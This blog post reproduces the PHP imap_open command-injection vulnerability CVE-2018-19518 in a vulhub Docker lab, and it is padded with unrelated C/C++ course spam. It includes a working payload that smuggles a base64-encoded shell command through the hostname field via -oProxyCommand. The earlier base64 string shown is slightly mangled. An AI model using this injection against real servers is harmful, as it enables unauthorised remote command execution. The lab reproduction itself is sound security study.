2024年PHP--远程命令执行漏洞CVE-2018-19518复现(1),2024年最新C C++最牛教材

img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

漏洞复现

首先进入环境,最好在root权限下进行

cd vulhub/php/CVE-2018-19518

然后我们进入到该目录下使用docker启动

docker-compose build
docker-compose up -d

在这里插入图片描述
然后我们访问该ip的8080端口,出现一个登陆界面,这里我们随意输入,准备采取抓包

在这里插入图片描述
使用burp进行抓包,并发送到Repeater里
在这里插入图片描述
然后我们修改数据包,添加一段执行代码
例如 echo ‘Hello’>/tmp/test,对它进行base64编码
ZWNobyAYSGVsbG8ZPi90bXAvdGVzdA==
在这里插入图片描述
这里-oProxyCommand 表示使用该参数。
%09后添加上面进行base64编码后的内容,再将部分内容进行url编码。

hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&username=111&password=222

点击send发送数据包以后,我们准备进入虚拟机查看是否创建成功
在这里插入图片描述

进入容器

这里我们进入容器查看刚才文件是否创建成功,先查询id

docker ps -a

查看容器id后在下面命令中输入id进入

docker exec -it ID /bin/bash

进入到tmp目录下查看文件

cd /tmp
ls -al
cat test



![img](https://img-blog.csdnimg.cn/img_convert/39fac37de59de674a53ab137bca2db22.png)
![img](https://img-blog.csdnimg.cn/img_convert/29db9191fe75e630d0a3d5634c792e80.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上C C++开发知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**

码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[如果你需要这些资料,可以戳这里获取](https://bbs.csdn.net/topics/618668825)**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值